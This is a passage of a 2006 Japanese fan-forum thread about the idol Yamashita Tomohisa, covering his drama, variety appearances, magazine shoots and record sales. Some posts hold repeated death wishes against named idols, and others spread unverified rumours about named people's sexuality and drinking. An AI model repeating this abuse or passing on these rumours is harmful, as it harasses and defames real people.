ttp://wwwz.fujitv.co.jp/b_hp/1231jcd/index.html

牛紺事務も出るのか?

284 :ユー&名無しネ:2006/12/26(火) 01:06:08 ID:KJ2EsY7l
タイの二人って年齢的に出れないんじゃないの?

285 :ユー&名無しネ:2006/12/26(火) 01:10:48 ID:LJ6RpJ1A
>284
石鹸の時のように前撮りとかかな?
FF歌ってくれるのはウレシス

286 :ユー&名無しネ:2006/12/26(火) 01:11:44 ID:/oiq4Yu9
明日は明日の風が吹くって感じの自由人かなPは

287 :ユー&名無しネ:2006/12/26(火) 01:30:42 ID:yK2jHyK+
>283
d
久しぶりのGYMタノスミだよ

288 :ユー&名無しネ:2006/12/26(火) 01:31:47 ID:BDCfWMkQ
タイで鳥インフル再発するかもね

289 :ユー&名無しネ:2006/12/26(火) 01:56:50 ID:X1L6t19v
山努さんアリガd

290 :ユー&名無しネ:2006/12/26(火) 02:06:06 ID:GzcUeM6A
山下智久って別に書いてあるから事務クル

291 :ユー&名無しネ:2006/12/26(火) 07:20:00 ID:Vc9N5I/P
山崎さんだけと食事したわけじゃないだろうし
山崎夫人が同席していたわけでもないでそ

292 :ユー&名無しネ:2006/12/26(火) 08:13:47 ID:1YCCgFEY
山崎さんktkr
黒鷺SP期待してるよ

293 :ユー&名無しネ:2006/12/26(火) 13:20:22 ID:oeD5tnpe
これから色んな事成功するんでしょうね?
殺界もぬけるしね

294 :ユー&名無しネ:2006/12/26(火) 14:23:50 ID:QIPKEPn6
文春の年末年始の番組評で
期待できる部類として堀部安兵衛の次に挙げられてた
ジャニドラだからと馬鹿にされてるわけでも無さそうで一安心

295 :ユー&名無しネ:2006/12/26(火) 15:26:01 ID:LXNsbGHw
マイクまだ17才

296 :ユー&名無しネ:2006/12/26(火) 16:48:45 ID:NI+/9BAq
新年5日の試写会が制作発表代わりみたくなるのかな?
とするとWSは6日当日になってしまうがそれもアリ?

297 :ユー&名無しネ:2006/12/26(火) 16:57:17 ID:hXS8BHiw
>285 スマソ前撮りってどういうこと?

298 :ユー&名無しネ:2006/12/26(火) 17:00:03 ID:rFCBylfv
>296
製作発表どうなってるんだろね?
当日って事もアリだとはオモーけど

299 :ユー&名無しネ:2006/12/26(火) 17:02:04 ID:Zr/A8aZx
>297
直前の近畿コンで撮ってVTRで流す

300 :ユー&名無しネ:2006/12/26(火) 17:08:14 ID:hXS8BHiw
>299 d
という事は近畿コンに出るのか

301 :ユー&名無しネ:2006/12/26(火) 17:13:23 ID:j0kEMIWz
話ブッタ切ってスマソだが
自分の携帯してしまったと打ったらshiteshimattaって変換されたよ(ww

302 :ユー&名無しネ:2006/12/26(火) 17:54:23 ID:wQtXBbvd
>300
深山は半年ロムれ
改行もコンじゃなく紺だし

303 :ユー&名無しネ:2006/12/26(火) 18:50:08 ID:lO6bZ1xg

 視
  age

304 :ユー&名無しネ:2006/12/26(火) 19:04:27 ID:iXJPrz7C
ロムれって今どき
レス内容に問題なければそこまで細かく言わなくてもいいとオモー

305 :ユー&名無しネ:2006/12/26(火) 19:14:17 ID:U/ESFpkT
姐サン達荒しやら何やらで疲れてんのカナ?
マターリを貴方の日常にしませんか(w

306 :ユー&名無しネ:2006/12/26(火) 19:43:39 ID:lO6bZ1xg

 膿
  万
   歳

307 :ユー&名無しネ:2006/12/26(火) 19:48:45 ID:zeWOoNgx
むしろ今は甘いくらいなんだけど…
以前のほうがもっと厳しいスレだったんだけど…

308 :ユー&名無しネ:2006/12/26(火) 19:52:09 ID:MN8LD6Lr
過去ログロムってみるとなかなか面白いよ

309 :ユー&名無しネ:2006/12/26(火) 19:55:36 ID:lPrMd6kZ
>294
文春でってとこがミソスープ今日はd汁

310 :ユー&名無しネ:2006/12/26(火) 19:55:45 ID:zaCnRXlQ
内容こそ今更だけどな
牛紺前に近畿紺なんて

311 :ユー&名無しネ:2006/12/26(火) 19:55:48 ID:tgM0Z/ul
厳しくしないと冬休み厨が...
(((゜д゜;)))

312 :ユー&名無しネ:2006/12/26(火) 20:17:49 ID:t+ekrXDH
ポッポッポー−やまポッポー

313 :ユー&名無しネ:2006/12/26(火) 20:22:50 ID:E+Ssiwz4
クロサギと局が変わっても試写会発表
これって蛇兄の趣味?

314 :ユー&名無しネ:2006/12/26(火) 20:26:24 ID:t/JBxW3K
公式UPです

315 :ユー&名無しネ:2006/12/26(火) 20:29:58 ID:/wyorhOO
>314
d見てくる

316 :ユー&名無しネ:2006/12/26(火) 20:30:47 ID:E+Ssiwz4
現代版の父ちゃんと母ちゃんはいないのかな?

317 :ユー&名無しネ:2006/12/26(火) 20:32:26 ID:N5sosWwQ
>316
昔と同じだよ

>314
d
歴史がわかっていいな
ジャニタレが絵で浮いてる(w

318 :ユー&名無しネ:2006/12/26(火) 20:53:40 ID:lO6bZ1xg
Pってタバコなに吸ってんの?

319 :ユー&名無しネ:2006/12/26(火) 22:08:06 ID:A/QrmoM3
この時期にビデオデッキのぶっ壊れorz
どうすればorz

320 :ユー&名無しネ:2006/12/26(火) 22:17:03 ID:Tk7WNAOv
歩誌のPが片乳ヌードに見えるのは自分だけですかそうですか

321 :ユー&名無しネ:2006/12/26(火) 22:19:51 ID:UTCISe4L
ジャニタレの絵ワロス
年表までわかりやすいな

322 :ユー&名無しネ:2006/12/26(火) 22:34:59 ID:SfCwxeAo
>319
この機会にHDDにしる

323 :ユー&名無しネ:2006/12/26(火) 22:53:46 ID:UNvPsTtw
今日某所で試写会だったとある<crew blog
明日WSくるかも試練

324 :ユー&名無しネ:2006/12/26(火) 23:06:08 ID:4QP08q3W
>323
よくある関係者だけの試写では?
テレ朝は毎日貼ってるからいいけど

325 :ユー&名無しネ:2006/12/26(火) 23:13:34 ID:RZkwVZY/
>323
d
Pもモチ観たよね
日記待ち

326 :ユー&名無しネ:2006/12/26(火) 23:14:29 ID:pNH04fpP
スーパーのレジ前でテレビ誌のP表紙のを最前列に何冊もデイスプレイしてきた
ドラエモン付録の

327 :ユー&名無しネ:2006/12/26(火) 23:46:12 ID:8rfJJ9xq
Pの個人ブログ発見した!疑いつつ見てたけど写メとかジャニーズウェブ更新前に似たような日記があったりして、信じるしかない。普通にコメントできるし返信もしてくれるし、少数しか知らないのかな!?かなりびっくり。知ってた人いますか?!本人…なんですかね!?

328 :ユー&名無しネ:2006/12/26(火) 23:48:45 ID:/jdDvZt0
>323
d
とりあえず貼ってみるか
そろそろWSきてもいい頃だしな

329 :ユー&名無しネ:2006/12/26(火) 23:51:14 ID:HBLPa+bW
>323
多分記者とかを集めた取材目的の試写会かな
WSは明日から張ってみるか

330 :ユー&名無しネ:2006/12/26(火) 23:57:10 ID:qTOKYtu2
>326
GJ 実は控え目ながら自分も整頓シテル

331 :ユー&名無しネ:2006/12/26(火) 23:59:40 ID:huqq/9NS
白虎隊公式充実しててイイ
絵がリアルだからそれ程違和感無いね

332 :ユー&名無しネ:2006/12/27(水) 00:02:50 ID:CkJ5xyhA
公式見てきたけど
峰治って次男なんだな
前にブログか何かで長男役がいると
見た気がするが知っている姐さんいる?

333 :ユー&名無しネ:2006/12/27(水) 00:11:51 ID:1MDUGvQY
>332
兄役は黄田川さんとガイシュツ

カウントダウンバトンktkr
山崎さんやU君達と食事できてよかったな

334 :ユー&名無しネ:2006/12/27(水) 00:12:12 ID:DdZ8i3/0
>332
マイボスのミッキー

335 :ユー&名無しネ:2006/12/27(水) 00:16:43 ID:CkJ5xyhA
>333-334
d
黄田川さん
自分的にはセラムンでの亀マニアさんのイメージが(w

336 :ユー&名無しネ:2006/12/27(水) 00:20:01 ID:zNw1YNjF
泣きそうになるなんてP純粋だね

337 :ユー&名無しネ:2006/12/27(水) 00:24:22 ID:4XR4cZwI
ぷっすまにP予告キタね
セクシーなビビリに困惑笑いなPワロス
早く見たい

338 :ユー&名無しネ:2006/12/27(水) 00:24:28 ID:XnA2Tleg
山崎さんとは演技の話多いな
ウレシス
カウントダウンバトンなんてやってたんだ

339 :ユー&名無しネ:2006/12/27(水) 00:26:10 ID:1FKMKGw/
ぷっすまビビリ王の中にエロドッキリもあんだね(w
物申すまであってウマーですた
スペサルおもしろくなってますように(-人-)

山崎サンに弱いねPチャソ
日記でパラはあったけど笛はかなり久々なのかな?

340 :ユー&名無しネ:2006/12/27(水) 00:28:25 ID:6zp3kYC6
山崎サンいい人だね
スタッフサンブログ見るかぎり期待できる
ぷっスマ不安もありテラ楽しみ

341 :ユー&名無しネ:2006/12/27(水) 00:28:43 ID:4+hl0KRg
パンツ見せられ嬉し恥ずかしPキターーー(゚∀゚)ーーーー !!!
何とも言えない表情してたな(w来年の2日まで待ちきれん

342 :ユー&名無しネ:2006/12/27(水) 00:28:47 ID:1MDUGvQY
予告キター
テラwktk
セクシーハプニングも風船もビビリ楽しみすぎる

343 :ユー&名無しネ:2006/12/27(水) 00:30:06 ID:trUtiKOE
やまぴーを語れ(避難所)
http://jbbs.livedoor.jp/music/7762/yamap.html

雑談【6】
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1159457228/

提案3
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1157093814/

344 :ユー&名無しネ:2006/12/27(水) 00:30:07 ID:1FKMKGw/
笛と焼肉の話あったから久々でもないね
間違えちゃった

345 :ユー&名無しネ:2006/12/27(水) 00:30:25 ID:XnA2Tleg
今までで1番のビビリってのコワス(w
途中ケツ振ってる予告なかったか?

346 :ユー&名無しネ:2006/12/27(水) 00:32:37 ID:LYij17F+
>345
あった
クレヨンしんちゃんのモノマネかな?

347 :ユー&名無しネ:2006/12/27(水) 00:33:09 ID:O2mbKGuE
ケツ振って撃つぞ言ってたな
ドラマも番宣も楽しみすぎる

348 :ユー&名無しネ:2006/12/27(水) 00:33:24 ID:IwO9gNE2
ケツ振ってる予告あったノシ
自分誰かと思ったらPでビビンバ
「撃つぞ!」とか言ってたな

349 :ユー&名無しネ:2006/12/27(水) 00:34:17 ID:trUtiKOE
あびる優がゲットした大物アイドル (ゲンダイネット)

あびる優(20)が「やった!」と叫んだかどうかは知らないが、
彼女が人気グループ「NEWS]の山下智久(21)をゲットしたことで話題騒然だ。

あびるに以前の笑顔が戻ったのはごく最近のことだ。
昨冬の窃盗告白騒動で一気に出番がなくなり、タレント生命が危ぶまれたほどだった。
そんな状況が一変したのは9月に放送されたテレビ朝日の番組企画「100キロマラソン」がキッカケだった。
あびるは今月掲載された本紙の連載コラム「リセット完了!」でも「一から出直すつもりでいる」と語った。

そのあびるが交際している山下は、先ごろ活動休止会見を開いた
「KAT―TUN」の赤西仁や亀梨和也以上に将来を期待されている人気アイドルだ。

発売中の「週刊文春」によれば、
2人は9月上旬に縁結びで有名な京都の地主神社を参拝しているところを見られ、
10月上旬には那覇市内の薄暗いバーなどでも目撃されたという。

「あびるといえば、ISSAやロンブーの淳との交際が有名です。
今回の山下は“山P”といわれて歌もドラマもヒットさせているビッグなアイドルで、
これまでの相手と比べものにならないくらいインパクトが強烈。
彼はジャニー喜多川氏のお気に入りで、熱狂的なファンが多いだけに、周囲の反発が怖いですね」(芸能関係者)

あびるは転んでもタダでは起きなかった。


350 :ユー&名無しネ:2006/12/27(水) 00:34:48 ID:U6RCr80h
お尻ふりふりは江頭の真似?

351 :ユー&名無しネ:2006/12/27(水) 00:35:21 ID:LYij17F+
P新米モテモテ刑事役似合ってた
ビビリ王ってよく考えたら来週なんだよね
楽しみ

352 :ユー&名無しネ:2006/12/27(水) 00:37:50 ID:ZqXjgGrC
たこやきは今からか
wktk

353 :ユー&名無しネ:2006/12/27(水) 00:40:31 ID:CkJ5xyhA
>351
いわれてみれば
そうか来週かホント早いな

354 :ユー&名無しネ:2006/12/27(水) 00:41:09 ID:4+hl0KRg
セクシービビリでどのくらい針が振れるか楽しみ
男ってああいう自分を第三者に見られるの凄く困るんだよな
テレ朝と事務所GJ

山崎さんやマブタチとも会っていいクリスマス過ごせてヨカタな

355 :ユー&名無しネ:2006/12/27(水) 00:41:52 ID:XnA2Tleg
ぷっすまHPの熊の助さん日記更新
ビビってるのかわからない今までにない反応だと(w
過去最大規模楽しみだな

356 :ユー&名無しネ:2006/12/27(水) 00:43:17 ID:trUtiKOE
Pってタバコなに吸ってんの?

357 :ユー&名無しネ:2006/12/27(水) 00:43:48 ID:1MDUGvQY
これまでにない反応
さすがP

358 :ユー&名無しネ:2006/12/27(水) 00:46:51 ID:O2mbKGuE
無反応ってことだよな(w
目に見える

359 :ユー&名無しネ:2006/12/27(水) 00:50:50 ID:6zp3kYC6
全然ビビリになってなかったらワロス
早く見たいノシ

360 :ユー&名無しネ:2006/12/27(水) 00:51:15 ID:XnA2Tleg
ドッキリ指数?は越えても驚かないとかな
リアクション薄そうだ(w

361 :ユー&名無しネ:2006/12/27(水) 00:52:31 ID:4+hl0KRg
反応はそれなりにあるんじゃね
見てる側の予想を裏切るビビリ方したんだろな
ヲタ的にはああやっぱりになる予感(w

362 :ユー&名無しネ:2006/12/27(水) 00:53:32 ID:trUtiKOE
山下・・・喫煙(FRIDAY)同棲(BUBKA)あびる(文春)
内・・・飲酒(仙台)、器物損壊、補導
錦戸・・・内に対する未成年者飲酒禁止法(仙台)
増田・・・飲酒(韓国)
小山・・・増田に対する未成年者飲酒禁止法(韓国)
草野・・・飲酒(BUBKA)
森内・・・喫煙(BUBKA)

手越・・・無罪
加藤・・・無罪

363 :ユー&名無しネ:2006/12/27(水) 00:56:27 ID:/TQiEBzV
>354
セクシービビリ見たい(w


364 :ユー&名無しネ:2006/12/27(水) 01:02:08 ID:CkJ5xyhA
ピチレモン2月号にPはガイシュツ?
自分みてないがフラゲした友からメールがきた

「Winter talk 君と語る、冬の午後」ラスイ

365 :ユー&名無しネ:2006/12/27(水) 01:08:19 ID:11HzP0nl
>355
今までにない反応ってテラワロス(w
予告のPカバエエな

366 :ユー&名無しネ:2006/12/27(水) 01:08:52 ID:1MDUGvQY
ガイシュツじゃないよd
今日はピチレとニコラだな

367 :ユー&名無しネ:2006/12/27(水) 01:24:30 ID:wjgl1QvV
今、来週の予告新人刑事やってたね
目の前でエロを見ても、控え目なPはやっぱすごい

368 :ユー&名無しネ:2006/12/27(水) 01:44:58 ID:5jPFpQgJ
ぷっすまたこやき今オワタ
刑事Pチャンカバエエ

369 :ユー&名無しネ:2006/12/27(水) 01:46:57 ID:RMtk+QBc
ぷっすま苦笑いのPがお色気なのか?
楽しみすぎる

370 :ユー&名無しネ:2006/12/27(水) 01:52:33 ID:5jPFpQgJ
バラで不思議ちゃんキャラをいじってもらえたら面白いんだろうけど扱い辛いんだろうな
そしてエガPが見たい(w

371 :ユー&名無しネ:2006/12/27(水) 01:57:17 ID:hyxWtlgV
21歳の成人男子だからこれからもセクシーなのどんどんキボン
ぷっすまwktkすぎて眠れない

372 :ユー&名無しネ:2006/12/27(水) 02:24:45 ID:JY25QyhZ
ぷっすま予告見忘れたがここ見てたらwktkになってきた

373 :ユー&名無しネ:2006/12/27(水) 02:25:55 ID:lALO/WYk
P来年もヨロシク
カウントダウンバトンの答え面白ろかったよ

374 :ユー&名無しネ:2006/12/27(水) 02:30:21 ID:5jPFpQgJ
控えめっていうかピュアーで初々しい反応にモエス

375 :ユー&名無しネ:2006/12/27(水) 02:43:00 ID:hyxWtlgV
今更だがPが普通の男だって再認識した
大丈夫大丈夫って全然大丈夫じゃないPにテラモエス

376 :ユー&名無しネ:2006/12/27(水) 03:08:03 ID:zNw1YNjF
普通じゃないよ
天然だよ…

377 :ユー&名無しネ:2006/12/27(水) 08:42:11 ID:1MDUGvQY
ニコラは撮影同じ日ぽいのに先月のはビミョンだたが今月はビズイイ
袴着て書き初めしたり餅食べたり
餅食べてるのが特にいいよ
ピチレは全体的に白で雰囲気がいいしビズも最後のページイイ
各3ページあってウマー

378 :ユー&名無しネ:2006/12/27(水) 08:50:24 ID:iUvaBFnn
帝都メトロ東西線に入ってるJR車輌にTBCのPみた!
満員電車で降りる瞬間だけなのが悔やまれる
白クマみたいなデカいフカフカの犬に抱きつくみたいに寝そべったビズいいP
写メ撮りたかったよん

379 :ユー&名無しネ:2006/12/27(水) 09:42:33 ID:nB0gu4jk
男性アイドル板に立ってる橘慶太VS山下智久スレ
http://music6.2ch.net/test/read.cgi/mendol/1163699557/

380 :ユー&名無しネ:2006/12/27(水) 10:06:30 ID:GG+F0IIF
>377
d

尻フリフリやら大丈夫大丈夫やら最後のお辞儀やらテラカバエエ
プッすまGJ!

381 :ユー&名無しネ:2006/12/27(水) 11:31:15 ID:jolL0p/q
ラジカルのオープニングでセニョ流れたよ
PVなしで曲のみだが

382 :ユー&名無しネ:2006/12/27(水) 12:14:15 ID:oOPuSIE5
尻フリフリの時の特別ゲストの声がしんちゃんぽい(w

383 :ユー&名無しネ:2006/12/27(水) 12:15:40 ID:JY25QyhZ
℃の連載にPの事書いてあるよ

384 :ユー&名無しネ:2006/12/27(水) 12:22:11 ID:RwjMMTbd
℃っくん真面目な感じだね
イケてるロン毛て(w

385 :ユー&名無しネ:2006/12/27(水) 13:17:02 ID:1MDUGvQY
℃連載のエピナツカシス
いろいろあったな

386 :ユー&名無しネ:2006/12/27(水) 13:57:15 ID:5jPFpQgJ
℃っくんにとってPチャンはセニョリータ!
しかし℃優しいね
彼は怖い話で一人で寝れないトイレ行けなくないPに付き合ってくれてただけなのに(w

387 :ユー&名無しネ:2006/12/27(水) 13:58:37 ID:5jPFpQgJ
訂正 行けなくない→行けなくなった
℃P夫婦みたい(w

388 :ユー&名無しネ:2006/12/27(水) 14:18:25 ID:6zp3kYC6
天使時代から腐れ縁だしヤパーリP℃はエエ脳

389 :ユー&名無しネ:2006/12/27(水) 14:28:13 ID:H93jBIST
紺中にイラン事して一緒に怒られたって
何したんだろ?(w
P℃ホコーリイイな

390 :ユー&名無しネ:2006/12/27(水) 14:37:22 ID:RMtk+QBc
今年の春紺で℃がPの肩に頭乗せて
Pが手で頭ポンポンしてるの思い出した
℃Pって対照的なイメージだけどホーコリしていいね

391 :ユー&名無しネ:2006/12/27(水) 16:05:49 ID:ygEaNlE2
軟派って若干シツレーだな(w

392 :ユー&名無しネ:2006/12/27(水) 16:06:30 ID:1MDUGvQY
>387って注意してもいつもチモイことレスしてる厨でスルー対象?
雰囲気悪くするつもりはないがピュアだとか夫婦とかちょっといきすぎ

393 :ユー&名無しネ:2006/12/27(水) 16:33:33 ID:lALO/WYk
℃っくん連載見てキタ
知らせてくれた姐さんd

394 :ユー&名無しネ:2006/12/27(水) 18:35:37 ID:iUvaBFnn
スルーされまくりで悲しいんだけどTBCの車内広告の白犬バーゾンは前から?
non'noやananに載ってるの以外にもあるなんて知らなかったもんなので
P担が本当にこのスレにいるのか不安だよ…

395 :ユー&名無しネ:2006/12/27(水) 18:44:48 ID:5jPFpQgJ
白犬に抱きついてるショットカバエエよね
梅田駅に使われてる大きいのは通る人みんな見てる

396 :ユー&名無しネ:2006/12/27(水) 18:46:30 ID:ZmQXiTdR
>394
スマソ車内広告を生で見た事ナス
non-no白犬ショットと別の白犬と座ってる円柱ポスターが前スレに落ちてた気が汁

397 :ユー&名無しネ:2006/12/27(水) 18:48:39 ID:iUvaBFnn
>395
d!
噂の梅田駅は当然のようにあるんだね
帝都でも同じようにじっくり見れるとこあれば行きたい

398 :ユー&名無しネ:2006/12/27(水) 18:52:32 ID:iUxVkNPl
>397
上の姐さんが言うように駅や車内の広告の報告は落ちてるよ
P担いるのって言う前にロムってみて栗

ニコラとピチレ(・∀・)イイ!!
レポ姐さんに同じく右上の餅食べてるPがヨス

399 :ユー&名無しネ:2006/12/27(水) 19:09:22 ID:prqPOHns
>398
d
ニコラとピチレゲトしてくるノシ

400 :ユー&名無しネ:2006/12/27(水) 19:29:50 ID:xJ7gZyr6
℃なにげに優しい文でホコーリ

401 :ユー&名無しネ:2006/12/27(水) 19:37:37 ID:ljRbbRfM
餅食べてるPが黒髪だがクルクルなせいか
金髪プードルだった時の$誌のビズに似てる
薬師丸さんのママソは氏んじゃうんだな

402 :ユー&名無しネ:2006/12/27(水) 19:56:22 ID:1FKMKGw/
ニコラは和装キリリキメ系でピチレはまったりリラックスPだね
薬師丸ママソアボンは戊辰戦争終戦後もちょびっとやるのかな
全力投球の書初めヘタクソでワロス

403 :ユー&名無しネ:2006/12/27(水) 21:10:18 ID:Zf1c/sxn
能無し大根山下はさっさと死ね

404 :ユー&名無しネ:2006/12/27(水) 21:43:33 ID:otn2Eyy9
>402
Pの書き文字は一度見ると忘れナス
相田みつをの様ダナ

405 :ユー&名無しネ:2006/12/27(水) 21:48:39 ID:YVt02G6U
>404
Pフォントは独特だよねw
味があって好き

406 :ユー&名無しネ:2006/12/27(水) 21:50:23 ID:CkJ5xyhA
Pフォトっていい響きだな(w
しかしなんでPはいつも縦書きなんだろう
Pらしくてスチだが不思議に思う

407 :ユー&名無しネ:2006/12/27(水) 22:13:28 ID:Zf1c/sxn
能無し大根山下はさっさと死ね

408 :ユー&名無しネ:2006/12/27(水) 22:43:31 ID:AgGzDt7O
顔ブサ低視聴率男の亀梨はさっさと死ね

409 :ユー&名無しネ:2006/12/27(水) 22:59:35 ID:Q7bU1l6j
ニコラのPテラカコエエな
特に3ページ目のアプがエエよ

410 :ユー&名無しネ:2006/12/27(水) 23:40:58 ID:1FKMKGw/
半紙から飛び出るぐらいダイナミックな字ともいえるが
左端に名前入れなくていいのかよ?(w
箸は左で筆は右ってへんてこサウスポーだね


411 :ユー&名無しネ:2006/12/27(水) 23:49:48 ID:5dS7mQIs
なんちゃって左利きなのしらないの

412 :ユー&名無しネ:2006/12/27(水) 23:56:33 ID:yavSDbcF
ズニア板にPスレ立てたり重複スレ立ててるヤシどうにかしてよ

413 :ユー&名無しネ:2006/12/27(水) 23:58:02 ID:Zf1c/sxn
能無し大根山下はさっさと死ね

414 :ユー&名無しネ:2006/12/28(木) 00:10:47 ID:2XTFjwc9
Pまだ見てないんだな

415 :ユー&名無しネ:2006/12/28(木) 00:21:08 ID:LNNWe0MZ
隊士全員で見たらスゴス
言葉が時代劇風だな
ニコラの餅食べるPのビズがいい

416 :ユー&名無しネ:2006/12/28(木) 00:24:36 ID:Fk+htWib
今日はホント天気良すぎたでござる
じれったいのか(w早く見たいだろうな

417 :ユー&名無しネ:2006/12/28(木) 00:29:35 ID:QjfrDM9s
試写会のとき一緒に見ないのかな
気付けばもうすぐwktk

418 :ユー&名無しネ:2006/12/28(木) 00:30:56 ID:2O3hYzFs
Pは5日の試写会では見ない(来ない)のかな?
網でも出演者未定になってるよね

419 :ユー&名無しネ:2006/12/28(木) 00:32:50 ID:2O3hYzFs
>417
被ったスマソ

420 :ユー&名無しネ:2006/12/28(木) 00:40:58 ID:JPq4+UFX
ドラマもうすぐだね楽しみ

421 :ユー&名無しネ:2006/12/28(木) 00:43:57 ID:48/vk9Mr
ニコラもいいがピチレもいいね

422 :ユー&名無しネ:2006/12/28(木) 01:00:28 ID:u6W6P95c
ホント今日は暖かくて気持ちいかったナ(w

白虎隊テラwktk


423 :ユー&名無しネ:2006/12/28(木) 01:01:07 ID:Jeq6WlgG
>412
自分たちも迷惑してるよ
あれは安置だから荒らしに言っても無理だと思う
削除依頼や削除板で相談するしかなさそう

424 :ユー&名無しネ:2006/12/28(木) 01:31:24 ID:vgLQBxzL
P5日の試写会知らない鴨(w
白隊士て℃んくさか?

425 :ユー&名無しネ:2006/12/28(木) 01:39:42 ID:F2aqblLk
5日の試写会は制作陣の最終確認で 
本当の意味での試写が行われたということ
それが終わってチーム白虎隊も解散したという意味でしょ

426 :ユー&名無しネ:2006/12/28(木) 02:24:09 ID:2O3hYzFs
>424
ナルホド!

>425


427 :ユー&名無しネ:2006/12/28(木) 02:49:45 ID:pj2pdtaM
女には自分から積極的にアタックするとか言ってるくせに
福山にはツンデレで向こうから仕掛けてくるように仕向けるホモ山下
親友の赤西がバイ発覚して赤西軍団がホモだらけって世間に公表されたから
赤西軍団のヤリ部屋に出入りしてた山下も認めざるを得ないね

428 :ユー&名無しネ:2006/12/28(木) 03:38:01 ID:ZpDL7XnC
>414
ノシ
いつ℃連載気付くんだろ(w
>425
5日のて1/5の公開試写会のコトでは

429 :425:2006/12/28(木) 06:54:02 ID:F2aqblLk
素で勘違いしたスマソ
スタッフの試写会の方と

430 :ユー&名無しネ:2006/12/28(木) 08:36:26 ID:Mgqnbexs
Pって感受性強くて寂しがりで可愛いな
愛されっ子タイプで羨ましい

431 :ユー&名無しネ:2006/12/28(木) 09:58:06 ID:rxj93dip
生まれつきのものだね


432 :ユー&名無しネ:2006/12/28(木) 11:25:43 ID:RfzjB4/4
さっきはなまるマーケットのイントロクイズでセニョが流れたよ
ベッキーが答えて正解してた

433 :ユー&名無しネ:2006/12/28(木) 12:15:37 ID:1+vNdeR9
ラジカルではお天気の時セニョPV流れた

434 :ユー&名無しネ:2006/12/28(木) 12:20:52 ID:oK3J43vI
昨日アミューズの忘年会で
マシャにPが送ったメ―ルを見せてもらった人の話によると
全部最後に必ず太陽の絵文字がついてて
可愛かったとのこと

435 :ユー&名無しネ:2006/12/28(木) 12:59:28 ID:gIe1pNVA
TBCの寝っころがって本持つP
白シャツに胸肉や二の腕の逞しさの上に美顔がのっかって
何度見ても萌える
今の黒ロン毛CカップのPに抱かれてみたいよぅ
握手会とか触れるイベやらないかなぁ

436 :ユー&名無しネ:2006/12/28(木) 13:42:07 ID:TLbS7Njd
>434
Pメール見れた人裏山

437 :ユー&名無しネ:2006/12/28(木) 14:07:41 ID:Mgqnbexs
総裁へのメルちょっとぶりっこ?キャワ

438 :ユー&名無しネ:2006/12/28(木) 14:18:15 ID:/dxG/5ZT
5日の試写会にPが来るのかテラ気になる
番協出てるから来るとオモーけど・・・

439 :ユー&名無しネ:2006/12/28(木) 14:33:29 ID:emApGfIJ
総裁ウラヤマシス

>424
亀だが今気がついた(w
「白隊士」って何だよP

440 :ユー&名無しネ:2006/12/28(木) 14:41:36 ID:ygxVXbTZ
ぷっすま予告のお尻フリフリはしんちゃんお尻対決なのか

441 :ユー&名無しネ:2006/12/28(木) 14:59:35 ID:zBHJgylF
細木さんの番組に出るって明日の?

442 :ユー&名無しネ:2006/12/28(木) 15:01:51 ID:2O3hYzFs
Pからマシャさんへのメール裏山
当たり障りないメールなんだろうが見せていいのかよ(w

443 :434:2006/12/28(木) 15:40:39 ID:oK3J43vI
いや内容までは読んでないと思うよ
Pからもらったメールの最後に必ず太陽ついてる
って見せてもらっただけかと

444 :ユー&名無しネ:2006/12/28(木) 16:00:10 ID:QjfrDM9s
マシャ裏山だけど気をつけてもらいたいね

445 :ユー&名無しネ:2006/12/28(木) 16:54:00 ID:XWoDBDUE
今日白虎隊のポスターが貼ってある店にポスター譲ってホスィと頼み込んできたら当たり前だが放送終了後に来てねと言われてシモタ
早く手に入れたいおw…自分語りスマソ

446 :ユー&名無しネ:2006/12/28(木) 17:08:43 ID:vgLQBxzL
>445
白虎隊ポスターてイパーンの店に貼ってあるのか?
知らなかった
どういう店に貼ってたのか能

447 :ユー&名無しネ:2006/12/28(木) 17:28:20 ID:AoIFaMC+
*3 *,600,001 ***,651 抱いてセニョリータ 山下智久 2006/05/31

448 :ユー&名無しネ:2006/12/28(木) 17:28:50 ID:56ygSSkr
2006オリ年間シングル1-12月リサイズver.
(2006/01/16付〜2007/01/01付迄)
(実質集計期間:2005/12/26〜2006/12/24)

*1 1,040,249 ***,745 Real Face KAT-TUN 2006/03/22
*2 *,617,951 *35,127 しるし Mr.Children 2006/11/15
*3 *,600,001 ***,651 抱いてセニョリータ 山下智久 2006/05/31
20 *,299,996 ***,*** フィーバーとフューチャー GYM 2006/08/30

449 :ユー&名無しネ:2006/12/28(木) 17:31:30 ID:2FV0tIIl
>447-448
d
3位オメ!
60マソ1枚ってワロス(w

450 :ユー&名無しネ:2006/12/28(木) 17:47:09 ID:RfzjB4/4
FFもあとたった4枚買えば30マンなんだね

451 :ユー&名無しネ:2006/12/28(木) 17:57:39 ID:QjfrDM9s
遂に60万オメ!!!!!!!
ヤパーリタモステ効果?
FFもギリギリでいかないし少しスッキリした(w

452 :ユー&名無しネ:2006/12/28(木) 18:29:21 ID:qPfoRZFo
60万オメ!
この日がついについに来たよ
ずっと待ってたよ

453 :ユー&名無しネ:2006/12/28(木) 18:31:10 ID:SGypXVK9
417 名前:名無しさん[sage] 投稿日:2006/12/28(木) 13:54:18
毎日いる荒らしが昨日からいない
こいつも規制に巻き込まれたのか?

417 名前:名無しさん[sage] 投稿日:2006/12/28(木) 13:54:18
毎日いる荒らしが昨日からいない
こいつも規制に巻き込まれたのか?

417 名前:名無しさん[sage] 投稿日:2006/12/28(木) 13:54:18
毎日いる荒らしが昨日からいない
こいつも規制に巻き込まれたのか?

417 名前:名無しさん[sage] 投稿日:2006/12/28(木) 13:54:18
毎日いる荒らしが昨日からいない
こいつも規制に巻き込まれたのか?

417 名前:名無しさん[sage] 投稿日:2006/12/28(木) 13:54:18
毎日いる荒らしが昨日からいない
こいつも規制に巻き込まれたのか?

417 名前:名無しさん[sage] 投稿日:2006/12/28(木) 13:54:18
毎日いる荒らしが昨日からいない
こいつも規制に巻き込まれたのか?

417 名前:名無しさん[sage] 投稿日:2006/12/28(木) 13:54:18
毎日いる荒らしが昨日からいない
こいつも規制に巻き込まれたのか?

417 名前:名無しさん[sage] 投稿日:2006/12/28(木) 13:54:18
毎日いる荒らしが昨日からいない
こいつも規制に巻き込まれたのか?

454 :ユー&名無しネ:2006/12/28(木) 19:06:48 ID:krjDCswX
60万いったのか
オメ

455 :ユー&名無しネ:2006/12/28(木) 19:15:21 ID:7Px69DiN
>447-448
d
セニョ60万超えオメ!

456 :ユー&名無しネ:2006/12/28(木) 19:18:26 ID:2ky7d163
テレ朝の白虎隊衣装や写真パネル置いてあるコーナーは
放送日くらいまではやってるよね?
行ってみたいんだが

